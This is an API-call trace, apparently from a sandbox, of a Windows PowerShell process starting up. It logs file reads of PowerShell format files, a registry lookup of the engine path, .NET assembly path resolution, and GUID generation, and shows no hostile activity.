	[0716.711] CoCreateGuid (in: pguid=0x26d4b0 | out: pguid=0x26d4b0*(Data1=0xc44c57ac, Data2=0xfd9f, Data3=0x4bbe, Data4=([0]=0xbf, [1]=0x7e, [2]=0xfb, [3]=0xc5, [4]=0xbc, [5]=0x27, [6]=0xf9, [7]=0x50))) returned 0x0
	[0716.711] CoCreateGuid (in: pguid=0x26d4b0 | out: pguid=0x26d4b0*(Data1=0xafb0df44, Data2=0x753, Data3=0x4954, Data4=([0]=0x8e, [1]=0x1a, [2]=0xb0, [3]=0xb2, [4]=0x30, [5]=0x9, [6]=0x22, [7]=0xa0))) returned 0x0
	[0716.712] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\certificate.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x2e8
	[0716.712] GetFileType (hFile=0x2e8) returned 0x1
	[0716.712] SetErrorMode (uMode=0x1) returned 0x1
	[0716.712] GetFileType (hFile=0x2e8) returned 0x1
	[0716.712] ReadFile (in: hFile=0x2e8, lpBuffer=0x32a0168, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d1f8, lpOverlapped=0x0 | out: lpBuffer=0x32a0168*, lpNumberOfBytesRead=0x26d1f8*=0x1000, lpOverlapped=0x0) returned 1
	[0716.714] ReadFile (in: hFile=0x2e8, lpBuffer=0x32a0168, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d1f8, lpOverlapped=0x0 | out: lpBuffer=0x32a0168*, lpNumberOfBytesRead=0x26d1f8*=0x1000, lpOverlapped=0x0) returned 1
	[0716.715] ReadFile (in: hFile=0x2e8, lpBuffer=0x32a0168, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d1f8, lpOverlapped=0x0 | out: lpBuffer=0x32a0168*, lpNumberOfBytesRead=0x26d1f8*=0x1000, lpOverlapped=0x0) returned 1
	[0716.715] ReadFile (in: hFile=0x2e8, lpBuffer=0x32a0168, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d1f8, lpOverlapped=0x0 | out: lpBuffer=0x32a0168*, lpNumberOfBytesRead=0x26d1f8*=0x1000, lpOverlapped=0x0) returned 1
	[0716.717] ReadFile (in: hFile=0x2e8, lpBuffer=0x32a0168, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d1f8, lpOverlapped=0x0 | out: lpBuffer=0x32a0168*, lpNumberOfBytesRead=0x26d1f8*=0x1000, lpOverlapped=0x0) returned 1
	[0716.717] ReadFile (in: hFile=0x2e8, lpBuffer=0x32a0168, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d1f8, lpOverlapped=0x0 | out: lpBuffer=0x32a0168*, lpNumberOfBytesRead=0x26d1f8*=0x1000, lpOverlapped=0x0) returned 1
	[0716.717] ReadFile (in: hFile=0x2e8, lpBuffer=0x32a0168, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d1f8, lpOverlapped=0x0 | out: lpBuffer=0x32a0168*, lpNumberOfBytesRead=0x26d1f8*=0xaca, lpOverlapped=0x0) returned 1
	[0716.717] ReadFile (in: hFile=0x2e8, lpBuffer=0x329f79a, nNumberOfBytesToRead=0x136, lpNumberOfBytesRead=0x26d1f8, lpOverlapped=0x0 | out: lpBuffer=0x329f79a*, lpNumberOfBytesRead=0x26d1f8*=0x0, lpOverlapped=0x0) returned 1
	[0716.717] ReadFile (in: hFile=0x2e8, lpBuffer=0x32a0168, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d1f8, lpOverlapped=0x0 | out: lpBuffer=0x32a0168*, lpNumberOfBytesRead=0x26d1f8*=0x0, lpOverlapped=0x0) returned 1
	[0716.718] CloseHandle (hObject=0x2e8) returned 1
	[0716.718] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x26cf40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0716.718] SetErrorMode (uMode=0x1) returned 0x1
	[0716.718] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\certificate.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x26d1a0 | out: lpFileInformation=0x26d1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67ddf6d2, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67ddf6d2, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5dddcd9, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x6aca)) returned 1
	[0716.718] SetErrorMode (uMode=0x1) returned 0x1
	[0716.718] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x26ced0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0716.719] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d288 | out: phkResult=0x26d288*=0x2e8) returned 0x0
	[0716.719] RegQueryValueExW (in: hKey=0x2e8, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x26d20c, lpData=0x0, lpcbData=0x26d208*=0x0 | out: lpType=0x26d20c*=0x1, lpData=0x0, lpcbData=0x26d208*=0x56) returned 0x0
	[0716.719] CoTaskMemAlloc (cb=0x5a) returned 0x1b8900e0
	[0716.719] RegQueryValueExW (in: hKey=0x2e8, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x26d1dc, lpData=0x1b8900e0, lpcbData=0x26d1d8*=0x56 | out: lpType=0x26d1dc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x26d1d8*=0x56) returned 0x0
	[0716.719] CoTaskMemFree (pv=0x1b8900e0) 
	[0716.719] RegCloseKey (hKey=0x2e8) returned 0x0
	[0716.719] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x26ced0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0716.719] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x26cd80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0716.725] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorlib.dll", nBufferLength=0x105, lpBuffer=0x26c710, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorlib.dll", lpFilePart=0x0) returned 0x3c
	[0716.726] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x26c710, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0718.775] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", nBufferLength=0x105, lpBuffer=0x26c710, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", lpFilePart=0x0) returned 0x48
	[0718.783] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c710, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0718.784] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x26c710, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0718.785] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Core\\3.5.0.0__b77a5c561934e089\\System.Core.dll", nBufferLength=0x105, lpBuffer=0x26c710, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Core\\3.5.0.0__b77a5c561934e089\\System.Core.dll", lpFilePart=0x0) returned 0x52
	[0718.792] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Configuration.Install\\2.0.0.0__b03f5f7f11d50a3a\\System.Configuration.Install.dll", nBufferLength=0x105, lpBuffer=0x26c710, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Configuration.Install\\2.0.0.0__b03f5f7f11d50a3a\\System.Configuration.Install.dll", lpFilePart=0x0) returned 0x74
	[0718.793] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x26c710, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0718.794] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_64\\System.Transactions\\2.0.0.0__b77a5c561934e089\\System.Transactions.dll", nBufferLength=0x105, lpBuffer=0x26c710, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_64\\System.Transactions\\2.0.0.0__b77a5c561934e089\\System.Transactions.dll", lpFilePart=0x0) returned 0x60
	[0718.798] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x26c710, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
	[0718.799] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0x26c710, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c
	[0718.800] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x26c710, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0718.801] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Xml\\2.0.0.0__b77a5c561934e089\\System.Xml.dll", nBufferLength=0x105, lpBuffer=0x26c710, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Xml\\2.0.0.0__b77a5c561934e089\\System.Xml.dll", lpFilePart=0x0) returned 0x50
	[0720.491] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management\\2.0.0.0__b03f5f7f11d50a3a\\System.Management.dll", nBufferLength=0x105, lpBuffer=0x26c710, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management\\2.0.0.0__b03f5f7f11d50a3a\\System.Management.dll", lpFilePart=0x0) returned 0x5e
	[0720.491] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.DirectoryServices\\2.0.0.0__b03f5f7f11d50a3a\\System.DirectoryServices.dll", nBufferLength=0x105, lpBuffer=0x26c710, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.DirectoryServices\\2.0.0.0__b03f5f7f11d50a3a\\System.DirectoryServices.dll", lpFilePart=0x0) returned 0x6c
	[0720.492] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorlib.dll", nBufferLength=0x105, lpBuffer=0x26c710, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorlib.dll", lpFilePart=0x0) returned 0x3c
	[0720.493] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x26c710, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0720.493] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", nBufferLength=0x105, lpBuffer=0x26c710, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", lpFilePart=0x0) returned 0x48
	[0720.494] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c710, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0722.140] VirtualQuery (in: lpAddress=0x26bd20, lpBuffer=0x26cbe0, dwLength=0x30 | out: lpBuffer=0x26cbe0*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0722.141] CoCreateGuid (in: pguid=0x26d4b0 | out: pguid=0x26d4b0*(Data1=0x2942e568, Data2=0x9b84, Data3=0x4405, Data4=([0]=0xaf, [1]=0x76, [2]=0x7e, [3]=0xec, [4]=0x80, [5]=0xba, [6]=0x77, [7]=0x20))) returned 0x0
	[0722.142] CoCreateGuid (in: pguid=0x26d4b0 | out: pguid=0x26d4b0*(Data1=0x2fbb85e0, Data2=0x336d, Data3=0x48b5, Data4=([0]=0xb7, [1]=0x66, [2]=0xf1, [3]=0xcc, [4]=0x6f, [5]=0x34, [6]=0xe2, [7]=0x8c))) returned 0x0
	[0722.143] VirtualQuery (in: lpAddress=0x26bed0, lpBuffer=0x26cd90, dwLength=0x30 | out: lpBuffer=0x26cd90*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0722.144] VirtualQuery (in: lpAddress=0x26bed0, lpBuffer=0x26cd90, dwLength=0x30 | out: lpBuffer=0x26cd90*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0722.146] CoCreateGuid (in: pguid=0x26d4b0 | out: pguid=0x26d4b0*(Data1=0xdc7f823b, Data2=0xbd3d, Data3=0x41fa, Data4=([0]=0xa3, [1]=0xb2, [2]=0x78, [3]=0x1d, [4]=0x7e, [5]=0xf1, [6]=0x4a, [7]=0xb6))) returned 0x0
	[0722.148] CoCreateGuid (in: pguid=0x26d4b0 | out: pguid=0x26d4b0*(Data1=0xfb92f76f, Data2=0xcab2, Data3=0x46be, Data4=([0]=0x86, [1]=0x7, [2]=0x1d, [3]=0x26, [4]=0x0, [5]=0x46, [6]=0xb7, [7]=0x30))) returned 0x0
	[0722.149] CoCreateGuid (in: pguid=0x26d4b0 | out: pguid=0x26d4b0*(Data1=0x19b61455, Data2=0x417, Data3=0x4921, Data4=([0]=0x8d, [1]=0x8f, [2]=0xd0, [3]=0x1e, [4]=0xda, [5]=0x60, [6]=0x81, [7]=0x7b))) returned 0x0
	[0723.606] VirtualQuery (in: lpAddress=0x26b790, lpBuffer=0x26c650, dwLength=0x30 | out: lpBuffer=0x26c650*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0723.607] CoCreateGuid (in: pguid=0x26d4b0 | out: pguid=0x26d4b0*(Data1=0x331b85b0, Data2=0xb58e, Data3=0x4fdd, Data4=([0]=0xad, [1]=0x8, [2]=0xf5, [3]=0x1c, [4]=0xc3, [5]=0x25, [6]=0xd8, [7]=0xae))) returned 0x0
	[0723.607] CoCreateGuid (in: pguid=0x26d4b0 | out: pguid=0x26d4b0*(Data1=0x9a428be0, Data2=0xfaaf, Data3=0x4db5, Data4=([0]=0x8c, [1]=0xaa, [2]=0xbd, [3]=0x92, [4]=0xb4, [5]=0x70, [6]=0xb0, [7]=0xca))) returned 0x0
	[0723.607] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\dotnettypes.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x2e8
	[0723.608] GetFileType (hFile=0x2e8) returned 0x1
	[0723.608] SetErrorMode (uMode=0x1) returned 0x1
	[0723.608] GetFileType (hFile=0x2e8) returned 0x1
	[0723.609] ReadFile (in: hFile=0x2e8, lpBuffer=0x3352760, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d1f8, lpOverlapped=0x0 | out: lpBuffer=0x3352760*, lpNumberOfBytesRead=0x26d1f8*=0x1000, lpOverlapped=0x0) returned 1
	[0723.610] ReadFile (in: hFile=0x2e8, lpBuffer=0x3352760, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d1f8, lpOverlapped=0x0 | out: lpBuffer=0x3352760*, lpNumberOfBytesRead=0x26d1f8*=0x1000, lpOverlapped=0x0) returned 1
	[0723.611] ReadFile (in: hFile=0x2e8, lpBuffer=0x3352760, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d1f8, lpOverlapped=0x0 | out: lpBuffer=0x3352760*, lpNumberOfBytesRead=0x26d1f8*=0x1000, lpOverlapped=0x0) returned 1
	[0723.611] ReadFile (in: hFile=0x2e8, lpBuffer=0x3352760, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d1f8, lpOverlapped=0x0 | out: lpBuffer=0x3352760*, lpNumberOfBytesRead=0x26d1f8*=0x1000, lpOverlapped=0x0) returned 1
	[0723.613] ReadFile (in: hFile=0x2e8, lpBuffer=0x3352760, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d1f8, lpOverlapped=0x0 | out: lpBuffer=0x3352760*, lpNumberOfBytesRead=0x26d1f8*=0x1000, lpOverlapped=0x0) returned 1
	[0723.613] ReadFile (in: hFile=0x2e8, lpBuffer=0x3352760, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d1f8, lpOverlapped=0x0 | out: lpBuffer=0x3352760*, lpNumberOfBytesRead=0x26d1f8*=0x1000, lpOverlapped=0x0) returned 1
	[0723.613] ReadFile (in: hFile=0x2e8, lpBuffer=0x3352760, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d1f8, lpOverlapped=0x0 | out: lpBuffer=0x3352760*, lpNumberOfBytesRead=0x26d1f8*=0x1000, lpOverlapped=0x0) returned 1
	[0723.613] ReadFile (in: hFile=0x2e8, lpBuffer=0x3352760, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d1f8, lpOverlapped=0x0 | out: lpBuffer=0x3352760*, lpNumberOfBytesRead=0x26d1f8*=0x1000, lpOverlapped=0x0) returned 1
	[0723.615] ReadFile (in: hFile=0x2e8, lpBuffer=0x3352760, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d1f8, lpOverlapped=0x0 | out: lpBuffer=0x3352760*, lpNumberOfBytesRead=0x26d1f8*=0x1000, lpOverlapped=0x0) returned 1
	[0723.615] ReadFile (in: hFile=0x2e8, lpBuffer=0x3352760, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d1f8, lpOverlapped=0x0 | out: lpBuffer=0x3352760*, lpNumberOfBytesRead=0x26d1f8*=0x1000, lpOverlapped=0x0) returned 1
	[0723.615] ReadFile (in: hFile=0x2e8, lpBuffer=0x3352760, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d1f8, lpOverlapped=0x0 | out: lpBuffer=0x3352760*, lpNumberOfBytesRead=0x26d1f8*=0x1000, lpOverlapped=0x0) returned 1
	[0723.616] ReadFile (in: hFile=0x2e8, lpBuffer=0x3352760, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d1f8, lpOverlapped=0x0 | out: lpBuffer=0x3352760*, lpNumberOfBytesRead=0x26d1f8*=0x1000, lpOverlapped=0x0) returned 1
	[0723.616] ReadFile (in: hFile=0x2e8, lpBuffer=0x3352760, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d1f8, lpOverlapped=0x0 | out: lpBuffer=0x3352760*, lpNumberOfBytesRead=0x26d1f8*=0x1000, lpOverlapped=0x0) returned 1
	[0723.617] ReadFile (in: hFile=0x2e8, lpBuffer=0x3352760, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d1f8, lpOverlapped=0x0 | out: lpBuffer=0x3352760*, lpNumberOfBytesRead=0x26d1f8*=0x1000, lpOverlapped=0x0) returned 1
	[0723.617] ReadFile (in: hFile=0x2e8, lpBuffer=0x3352760, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d1f8, lpOverlapped=0x0 | out: lpBuffer=0x3352760*, lpNumberOfBytesRead=0x26d1f8*=0x1000, lpOverlapped=0x0) returned 1
	[0723.617] ReadFile (in: hFile=0x2e8, lpBuffer=0x3352760, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d1f8, lpOverlapped=0x0 | out: lpBuffer=0x3352760*, lpNumberOfBytesRead=0x26d1f8*=0x1000, lpOverlapped=0x0) returned 1
	[0723.620] ReadFile (in: hFile=0x2e8, lpBuffer=0x3352760, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d1f8, lpOverlapped=0x0 | out: lpBuffer=0x3352760*, lpNumberOfBytesRead=0x26d1f8*=0x1000, lpOverlapped=0x0) returned 1
	[0723.620] ReadFile (in: hFile=0x2e8, lpBuffer=0x3352760, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d1f8, lpOverlapped=0x0 | out: lpBuffer=0x3352760*, lpNumberOfBytesRead=0x26d1f8*=0xbce, lpOverlapped=0x0) returned 1
	[0723.620] ReadFile (in: hFile=0x2e8, lpBuffer=0x3351e96, nNumberOfBytesToRead=0x32, lpNumberOfBytesRead=0x26d1f8, lpOverlapped=0x0 | out: lpBuffer=0x3351e96*, lpNumberOfBytesRead=0x26d1f8*=0x0, lpOverlapped=0x0) returned 1
	[0723.620] ReadFile (in: hFile=0x2e8, lpBuffer=0x3352760, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d1f8, lpOverlapped=0x0 | out: lpBuffer=0x3352760*, lpNumberOfBytesRead=0x26d1f8*=0x0, lpOverlapped=0x0) returned 1
	[0723.621] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d288 | out: phkResult=0x26d288*=0x2e8) returned 0x0
	[0723.621] RegQueryValueExW (in: hKey=0x2e8, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x26d20c, lpData=0x0, lpcbData=0x26d208*=0x0 | out: lpType=0x26d20c*=0x1, lpData=0x0, lpcbData=0x26d208*=0x56) returned 0x0
	[0723.621] CoTaskMemAlloc (cb=0x5a) returned 0x1b890070
	[0723.621] RegQueryValueExW (in: hKey=0x2e8, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x26d1dc, lpData=0x1b890070, lpcbData=0x26d1d8*=0x56 | out: lpType=0x26d1dc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x26d1d8*=0x56) returned 0x0
	[0723.621] CoTaskMemFree (pv=0x1b890070) 
	[0723.621] RegCloseKey (hKey=0x2e8) returned 0x0
	[0723.621] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x26ced0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0723.621] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x26cd80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0723.628] CoCreateGuid (in: pguid=0x26d4b0 | out: pguid=0x26d4b0*(Data1=0xc55ef84c, Data2=0x3357, Data3=0x4f9d, Data4=([0]=0xaf, [1]=0x9a, [2]=0x36, [3]=0x67, [4]=0x15, [5]=0x61, [6]=0x9d, [7]=0xb2))) returned 0x0
	[0723.628] CoCreateGuid (in: pguid=0x26d4b0 | out: pguid=0x26d4b0*(Data1=0xb1326981, Data2=0xf5b3, Data3=0x440f, Data4=([0]=0x92, [1]=0xb7, [2]=0x8c, [3]=0xfb, [4]=0x90, [5]=0xd2, [6]=0x50, [7]=0x66))) returned 0x0
	[0723.629] CoCreateGuid (in: pguid=0x26d4b0 | out: pguid=0x26d4b0*(Data1=0x3249ddd6, Data2=0x6a8c, Data3=0x459b, Data4=([0]=0x9a, [1]=0x57, [2]=0xc5, [3]=0xde, [4]=0xdc, [5]=0xac, [6]=0x90, [7]=0x8a))) returned 0x0
	[0723.629] CoCreateGuid (in: pguid=0x26d4b0 | out: pguid=0x26d4b0*(Data1=0x3698d709, Data2=0xcfed, Data3=0x4598, Data4=([0]=0xad, [1]=0x50, [2]=0x16, [3]=0x92, [4]=0x13, [5]=0x5a, [6]=0xfd, [7]=0x85))) returned 0x0
	[0723.629] CoCreateGuid (in: pguid=0x26d4b0 | out: pguid=0x26d4b0*(Data1=0xf4538096, Data2=0xaa7c, Data3=0x4ba9, Data4=([0]=0xb9, [1]=0xff, [2]=0xb2, [3]=0xef, [4]=0x28, [5]=0x0, [6]=0xeb, [7]=0x4f))) returned 0x0
	[0723.629] CoCreateGuid (in: pguid=0x26d4b0 | out: pguid=0x26d4b0*(Data1=0x1493244d, Data2=0xa819, Data3=0x4e30, Data4=([0]=0x97, [1]=0x1d, [2]=0xc9, [3]=0x7d, [4]=0x36, [5]=0x79, [6]=0x14, [7]=0x6d))) returned 0x0
